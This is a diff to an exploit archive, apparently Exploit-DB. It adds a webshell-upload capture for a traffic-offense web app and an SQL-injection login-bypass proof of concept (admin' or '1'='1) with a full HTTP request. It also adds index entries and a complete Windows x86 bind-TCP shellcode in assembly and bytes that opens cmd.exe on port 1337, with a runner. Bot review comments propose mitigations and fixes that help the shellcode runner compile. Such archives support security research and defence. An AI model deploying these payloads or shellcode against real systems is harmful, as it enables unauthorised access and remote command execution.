+Date: Thu, 07 Oct 2021 08:35:21 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 20
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+{"status":"success"}
+
+-----------------------------------------------------------------------------------------------------------------------
+
+# Request to webshell
+
+GET /traffic_offense/uploads/drivers/19.php?cmd=whoami HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+
+-----------------------------------------------------------------------------------------------------------------------
+
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 08:39:15 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Access-Control-Allow-Origin: *
+Content-Length: 95
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
+
+desktop-uhrf0c6\hubert
+
\ No newline at end of file
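Review bot: The advisory shows three upload endpoints accepting a `.php` file sent as `application/octet-stream`, but it never states the root cause or a fix, which is what a defender reading it needs most. Adding a short section such as `# Root cause: the upload handlers keep the client-supplied extension and store the file under the web root (uploads/), where the server appears to execute it as PHP` and `# Mitigation: allow-list image extensions and verify content server-side, store uploads outside the document root or disable script execution for uploads/, and disable directory indexing` would cover it. The "Index of /traffic_offense/uploads" listing in the middle of the hunk shows directory indexing is enabled on that path, which is a separate hardening gap worth naming explicitly rather than leaving implicit in the capture. The header typo `# Testeted on:` should read `# Tested on:`.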
diff --git a/exploits/php/webapps/50390.txt b/exploits/php/webapps/50390.txt
new file mode 100644
index 000000000..d7180f0ca
--- /dev/null
+++ b/exploits/php/webapps/50390.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass
+# Date: 07.10.2021
+# Exploit Author: Mevlüt Yılmaz
+# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
+# Version: 1.0
+# Tested on: Windows 10, Kali Linux
+# Simple Online College Entrance Exam System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.
+
+Steps To Reproduce:
+1 - Go to the login page http://localhost/entrance_exam/admin/login.php
+2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.
+3 - Click on "Login" button and you are logged in as administrator.
+
+PoC
+
+POST /entrance_exam/Actions.php?a=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 45
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/entrance_exam/admin/login.php
+Cookie: PHPSESSID=57upokqf37b2fjs4o5tc84cd8n
+
+username=admin'+or+'1'%3D'1&password=anything
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8ad474693..e5b9a8e7e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11395,6 +11395,7 @@ id,file,description,date,author,type,platform,port
50332,exploits/windows/local/50332.py,"Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
50336,exploits/windows/local/50336.py,"Cyberfox Web Browser 52.9.1 - Denial-of-Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows,
50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows,
+50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44495,4 +44496,9 @@ id,file,description,date,author,type,platform,port
50380,exploits/multiple/webapps/50380.txt,"Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,multiple,
50381,exploits/multiple/webapps/50381.txt,"Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection",1970-01-01,"Emel Basayar",webapps,multiple,
50382,exploits/php/webapps/50382.py,"Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure",1970-01-01,"Ron Jost",webapps,php,
-50383,exploits/multiple/webapps/50383.sh,"Apache HTTP Server 2.4.49 - Path Traversal",1970-01-01,"Lucas Souza",webapps,multiple,
+50383,exploits/multiple/webapps/50383.sh,"Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)",1970-01-01,"Lucas Souza",webapps,multiple,
+50386,exploits/php/webapps/50386.txt,"Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting",1970-01-01,"Yash Mahajan",webapps,php,
+50387,exploits/php/webapps/50387.txt,"Online Traffic Offense Management System 1.0 - Multiple SQL Injection (Unauthenticated)",1970-01-01,snup,webapps,php,
+50388,exploits/php/webapps/50388.txt,"Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)",1970-01-01,snup,webapps,php,
+50389,exploits/php/webapps/50389.txt,"Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)",1970-01-01,snup,webapps,php,
+50390,exploits/php/webapps/50390.txt,"Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mevlüt Yılmaz",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index d7c2e1ee8..aeb0cba5d 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1043,3 +1043,4 @@ id,file,description,date,author,type,platform
50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",1970-01-01,d7x,shellcode,linux_x86
50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64
50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
+50384,shellcodes/windows_x86/50384.c,"Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
diff --git a/shellcodes/windows_x86/50384.c b/shellcodes/windows_x86/50384.c
new file mode 100644
index 000000000..c824c7340
--- /dev/null
+++ b/shellcodes/windows_x86/50384.c
@@ -0,0 +1,324 @@
+; Name: Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
+; Author: h4pp1n3ss
+; Date: Wed 10/06/2021
+; Tested on: Microsoft Windows [Version 10.0.19042.1237]
+
+; Description:
+; This a bind tcp shellcode that open a listen socket on 0.0.0.0 and port 1337. In order to accomplish this task the shellcode uses
+; the PEB method to locate the baseAddress of the required module and the Export Directory Table to locate symbols.
+; Also the shellcode uses a hash function to gather dynamically the required symbols without worry about the length.
+
+ start: ;
+
+ mov ebp, esp ;
+ add esp, 0xfffff9f0 ; Avoid null-bytes and stack clobbering
+
+ find_kernel32:
+
+ xor ecx, ecx ; ECX = Null
+ mov esi,fs:[ecx+0x30] ; ESI = &(PEB) ([FS:0x30])
+ mov esi,[esi+0x0C] ; ESI = PEB->Ldr
+ mov esi,[esi+0x1C] ; ESI = PEB->Ldr.InInitOrder
+
+ next_module: ;
+
+ mov ebx, [esi+0x08] ; EBX = InInitOrder[X].base_address
+ mov edi, [esi+0x20] ; EDI = InInitOrder[X].module_name
+ mov esi, [esi] ; ESI = InInitOrder[X].flink (next module)
+ cmp [edi+12*2], cx ; (unicode) module_name[12] == 0x00 / we found kernel32.dll?
+ jne next_module ; No: try next module
+
+ find_function_shorten: ;
+
+ jmp find_function_shorten_bnc ; short jump
+
+ find_function_ret: ;
+
+ pop esi ; ESI = POP return addres
+ mov [ebp+0x04], esi ; Save find_function address for later usage
+ jmp resolve_symbols_kernel32 ;
+
+ find_function_shorten_bnc: ;
+ call find_function_ret ; Call fund_function_ret PUSH ret address into the stack
+
+ find_function: ;
+
+ pushad ; Save all registers
+ mov eax, [ebx+0x3c] ; Offset of PE signature
+ mov edi, [ebx+eax+0x78] ; Export Table Directory RVA
+ add edi, ebx ; Export Table Directory VMA
+ mov ecx, [edi+0x18] ; NumberOfNames
+ mov eax, [edi+0x20] ; AddressOfNames RVA
+ add eax, ebx ; AddresOfNames VMA
+ mov [ebp-4], eax ; Save AddressOfName VMA for later usage
+
+ find_function_loop: ;
+ jecxz find_function_finished ; Jump to the end if ECX is 0
+ dec ecx ; Decrement our counter
+ mov eax, [ebp-4] ; Restore AddressOfNames VMA
+ mov esi, [eax+ecx*4] ; Get the RVA of the symbol name
+ add esi, ebx ; Set ESI to the VMA of the current symbol name
+
+ compute_hash: ;
+ xor eax, eax ; EAX = Null
+ cdq ; Null EDX
+ cld ; Clear direction flag
+
+ compute_hash_again:
+ lodsb ; Load the next bytes from ESI into al
+ test al, al ; Check for Null terminator
+ jz compute_hash_finished ; If the ZF is set, we've hit the NULL term
+ ror edx, 0x0d ; Rotate edx 13 bits to the right
+ add edx, eax ; Add the new byte to the accumulator
+ jmp compute_hash_again ; Next iteration
+
+ compute_hash_finished: ;
+
+ find_function_compare:
+ cmp edx, [esp+0x24] ; Compare the computed hash with the requested hash
+ jnz find_function_loop ; If it doesn't match go back to find_function_loop
+ mov edx, [edi+0x24] ; AddressOfNameOrdinals RVA
+ add edx, ebx ; AddressOfNameOrdinals VMA
+ mov cx, [edx+2*ecx] ; Extrapolate the function's ordinal
+ mov edx, [edi+0x1c] ; AddressOfFunctions RVA
+ add edx, ebx ; AddressOfFunctions VMA
+ mov eax, [edx+4*ecx] ; Get the function RVA
+ add eax, ebx ; Get the function VMA
+ mov [esp+0x1c], eax ; Overwrite stack version of eax from pushad
+
+ find_function_finished: ;
+ popad ; Restore registers
+ ret ;
+
+ resolve_symbols_kernel32: ;
+ push 0x78b5b983 ; TerminateProcess hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x10], eax ; Save TerminateProcess address for later usage
+ push 0xec0e4e8e ; LoadLibraryA hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x14], eax ; Save LoadLibraryA address for later usage
+ push 0x16b3fe72 ; CreateProcessA hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x18], eax ; Save CreateProcessA address for later usage
+
+ load_ws2_32: ;
+ xor eax, eax ; EAX = Null
+ mov ax, 0x6c6c ; EAX = 0x6c6c
+ push eax ; ESP = "ll"
+ push dword 0x642e3233 ; ESP = "32.dll"
+ push dword 0x5f327377 ; ESP = "ws2_32.dll"
+ push esp ; ESP = &("ws2_32.dll")
+ call dword [ebp+0x14] ; Call LoadLibraryA
+
+resolve_symbols_ws2_32:
+ mov ebx, eax ; Move the base address of ws2_32.dll to EBX
+ push 0x3bfcedcb ; WSAStartup hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x1C], eax ; Save WSAStartup address for later usage
+ push 0xadf509d9 ; WSASocketA hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x20], eax ; Save WSASocketA address for later usage
+ push 0xc7701aa4 ; Bind hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x24], eax ; Save Bind address for later usage
+ push 0xe92eada4 ; listen hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x28], eax ; Save listen address for later usage
+ push 0x9f5b7976 ; WSAGetLastError hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x32], eax ; Save WSAGetLastError address for later usage
+ push 0x498649e5 ; accept hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x36], eax ; Save acccept address for later usage
+
+ call_wsastartup: ;
+ mov eax, esp ; Move ESP to EAX
+ mov cx, 0x590 ; Move 0x590 to CX
+ sub eax, ecx ; Substract CX from EAX to avoid overwriting the structure later
+ push eax ; Push lpWSAData
+ xor eax, eax ; EAX = Null
+ mov ax, 0x0202 ; Move version to AX
+ push eax ; Push wVersionRequired (0x00000202)
+ call dword [ebp+0x1C] ; Call WSAStartup(WORD wVersionRequired, LPWSADATA lpWSAData)
+
+ call_wsasocketa: ; WSASocketA(AF_INET = 2, SOCK_STREAM = 1, TCP = 6, NULL, NULL, NULL )
+ xor eax, eax ; EAX = Null
+ push eax ; Push dwFlags
+ push eax ; Push g
+ push eax ; Push lpProtocolInfo
+ mov al, 0x06 ; Move AL, IPPROTO_TCP
+ push eax ; Push protocol
+ sub al, 0x05 ; Substract 0x05 from AL, AL = 0x01
+ push eax ; Push type
+ inc eax ; Increase EAX, EAX = 0x02
+ push eax ; Push af
+ call dword [ebp+0x20] ; Call WSASocketA(2,1,6,0,0,0)
+
+ create_sockaddr_in_struct: ; sockaddr_in {AF_INET = 2; p1337 = 0x3905; INADDR_ANY = 0x5D00A8C0}
+ mov esi, eax ; Move the SOCKET descriptor to ESI
+ xor eax, eax ; EAX = Null
+ push eax ; Push sin_addr (any address 0.0.0.0)
+ mov ax, 0x3905 ; Move the sin_port (example: 1337) to AX (EAX = 0x00003905)
+ shl eax, 0x10 ; Left shift EAX by 0x10 bytes (EAX = 0x39050000)
+ add ax, 0x02 ; Add 0x02 (AF_INET) to AX
+ push eax ; Push sin_port & sin_family
+ push esp ; Push pointer to the sockaddr_in structure
+ pop edi ; EDI = &(sockaddr_in)
+
+ call_bind: ; bind(SOCKET *s = ESI, const sockaddr *addr = EDI, int namelen = 0x16)
+ xor eax, eax ; EAX = Null
+ add al, 0x16 ; Set AL to 0x16
+ push eax ; Push namelen
+ push edi ; Push *addr
+ push esi ; Push s
+ call dword [ebp+0x24] ; Call bind
+
+ call_wsagetlaserror: ; WSAGetLastError() (just for debugging purpouse)
+ call dword [ebp+0x32] ; Call WSAGetLastError
+
+ call_listen: ;
+ xor eax, eax ; EAX = Null
+ push eax ; Push backlog
+ push esi ; Push s
+ call dword [ebp+0x28] ; Call WS2_32!listen
+
+ call_accept: ; accept( SOCKET s, sockaddr *addr, int *addrlen)
+ xor eax, eax ; EAX = Null
+ push eax ; Push *addrlen (optional)
+ push eax ; Push *addr (optional)
+ push esi ; Push socket HANDLE from WSASocketA()
+ call dword [ebp+0x36] ; Call accept(SOCKET s ,Null, Null)
+
+ create_startupinfoa: ;
+ mov esi, eax ; Save Handle returned from accept() into ESI
+ push esi ; Push hStdError
+ push esi ; Push hStdOutput
+ push esi ; Push hStdInput
+ xor eax, eax ; EAX = Null
+ push eax ; Push lpReserved2
+ push eax ; Push cbReserved2 & wShowWindow
+ mov al, 0x80 ; Move 0x80 to AL
+ xor ecx, ecx ; EAX = Null
+ mov cl, 0x80 ; Move 0x80 to CL
+ add eax, ecx ; Set EAX to 0x100
+ push eax ; Push dwFlags
+ xor eax, eax ; EAX = Null
+ push eax ; Push dwFillAttribute
+ push eax ; Push dwYCountChars
+ push eax ; Push dwXCountChars
+ push eax ; Push dwYSize
+ push eax ; Push dwXSize
+ push eax ; Push dwY
+ push eax ; Push dwX
+ push eax ; Push lpTitle
+ push eax ; Push lpDesktop
+ push eax ; Push lpReserved
+ mov al, 0x44 ; Move 0x44 to AL
+ push eax ; Push cb
+ push esp ; Push pointer to the STARTUPINFOA structure
+ pop edi ; Store pointer to STARTUPINFOA in EDI
+
+ create_cmd_string: ;
+ mov eax, 0xff9a879b ; Move 0xff9a879b into EAX
+ neg eax ; Negate EAX, EAX = 00657865
+ push eax ; Push part of the "cmd.exe" string
+ push 0x2e646d63 ; Push the remainder of the "cmd.exe" string
+ push esp ; Push pointer to the "cmd.exe" string
+ pop ebx ; Store pointer to the "cmd.exe" string in EBX
+
+ call_createprocessa: ;
+ mov eax, esp ; Move ESP to EAX
+ xor ecx, ecx ; ECX = Null
+ mov cx, 0x390 ; Move 0x390 to CX
+ sub eax, ecx ; Substract CX from EAX to avoid overwriting the structure later
+ push eax ; Push lpProcessInformation
+ push edi ; Push lpStartupInfo
+ xor eax, eax ; EAX = Null
+ push eax ; Push lpCurrentDirectory
+ push eax ; Push lpEnvironment
+ push eax ; Push dwCreationFlags
+ inc eax ; Increase EAX, EAX = 0x01 (TRUE)
+ push eax ; Push bInheritHandles
+ dec eax ; EAX = Null
+ push eax ; Push lpThreadAttributes
+ push eax ; Push lpProcessAttributes
+ push ebx ; Push lpCommandLine
+ push eax ; Push lpApplicationName
+ call dword [ebp+0x18] ; Call CreateProcessA
+
+ call_terminate_process: ;
+ xor eax, eax ; EAX = Null
+ push eax ; uExitCode
+ push 0xffffffff ; HANDLE hProcess
+ call dword [ebp+0x04] ; Call TerminateProcess
+
+
+[*]================================= POC =============================== [*]
+
+
+
+/*
+
+ Shellcode runner author: reenz0h (twitter: @sektor7net)
+
+*/
+#include
+#include
+#include
+#include
+
+// nasm -f win32 shellcode.asm -o shellcode.o
+// objdump -D ./shellcode.o |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
+
+
+unsigned char payload[] =
+ "\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b"
+ "\x76\x1c\x8b\x5e\x08\x8b\x7e\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06"
+ "\x5e\x89\x75\x04\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43\x3c\x8b\x7c\x03"
+ "\x78\x01\xdf\x8b\x4f\x18\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b"
+ "\x45\xfc\x8b\x34\x88\x01\xde\x31\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca"
+ "\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75\xdf\x8b\x57\x24\x01\xda\x66\x8b"
+ "\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89\x44\x24\x1c\x61\xc3"
+ "\x68\x83\xb9\xb5\x78\xff\x55\x04\x89\x45\x10\x68\x8e\x4e\x0e\xec\xff\x55"
+ "\x04\x89\x45\x14\x68\x72\xfe\xb3\x16\xff\x55\x04\x89\x45\x18\x31\xc0\x66"
+ "\xb8\x6c\x6c\x50\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x55\x14"
+ "\x89\xc3\x68\xcb\xed\xfc\x3b\xff\x55\x04\x89\x45\x1c\x68\xd9\x09\xf5\xad"
+ "\xff\x55\x04\x89\x45\x20\x68\xa4\x1a\x70\xc7\xff\x55\x04\x89\x45\x24\x68"
+ "\xa4\xad\x2e\xe9\xff\x55\x04\x89\x45\x28\x68\x76\x79\x5b\x9f\xff\x55\x04"
+ "\x89\x45\x32\x68\xe5\x49\x86\x49\xff\x55\x04\x89\x45\x36\x89\xe0\x66\xb9"
+ "\x90\x05\x29\xc8\x50\x31\xc0\x66\xb8\x02\x02\x50\xff\x55\x1c\x31\xc0\x50"
+ "\x50\x50\xb0\x06\x50\x2c\x05\x50\x40\x50\xff\x55\x20\x89\xc6\x31\xc0\x50"
+ "\x66\xb8\x05\x39\xc1\xe0\x10\x66\x83\xc0\x02\x50\x54\x5f\x31\xc0\x04\x16"
+ "\x50\x57\x56\xff\x55\x24\xff\x55\x32\x31\xc0\x50\x56\xff\x55\x28\x31\xc0"
+ "\x50\x50\x56\xff\x55\x36\x89\xc6\x56\x56\x56\x31\xc0\x50\x50\xb0\x80\x31"
+ "\xc9\xb1\x80\x01\xc8\x50\x31\xc0\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50"
+ "\xb0\x44\x50\x54\x5f\xb8\x9b\x87\x9a\xff\xf7\xd8\x50\x68\x63\x6d\x64\x2e"
+ "\x54\x5b\x89\xe0\x31\xc9\x66\xb9\x90\x03\x29\xc8\x50\x57\x31\xc0\x50\x50"
+ "\x50\x40\x50\x48\x50\x50\x53\x50\xff\x55\x18\x31\xc0\x50\x6a\xff\xff\x55"
+ "\x04";
+
+unsigned int payload_len = 415;
+
+int main(void) {
+
+ void * exec_mem;
+ BOOL rv;
+ HANDLE th;
+ DWORD oldprotect = 0;
+
+ exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+ RtlMoveMemory(exec_mem, payload, payload_len);
+
+ rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
+
+ printf("Shellcode Length: %d\n", strlen(payload));
+
+ if ( rv != 0 ) {
+ th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
+ WaitForSingleObject(th, -1);
+
+ }
+
+ return 0;
+}
\ No newline at end of file
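Review bot: The C harness at the end of this file cannot compile as committed: the four `#include` directives carry no header names (presumably `<windows.h>`, `<stdio.h>` and `<string.h>` for VirtualAlloc/printf/strlen; the fourth is not recoverable from here), and the NASM listing plus the `[*]==== POC ====` banner above them sit in the same `.c` file outside any comment, so either wrap them in `/* ... */` or move the listing to its own `.asm` file and keep only the `nasm`/`objdump` build line as a comment. In `main`, `printf("Shellcode Length: %d\n", strlen(payload));` passes a `size_t` to `%d`; since the length is already pinned by `payload_len`, print that with `%u` (or use `%zu` if `strlen` stays). The `VirtualAlloc` result is passed to `RtlMoveMemory` unchecked, so add `if (exec_mem == NULL) return 1;` before the copy, and `WaitForSingleObject(th, -1)` should spell the timeout as `INFINITE` rather than relying on the implicit conversion of `-1` to `DWORD`. The handle from `CreateThread` is likewise used without a NULL check and never released (`CloseHandle`/`VirtualFree`), which is harmless at process exit but worth a one-line comment.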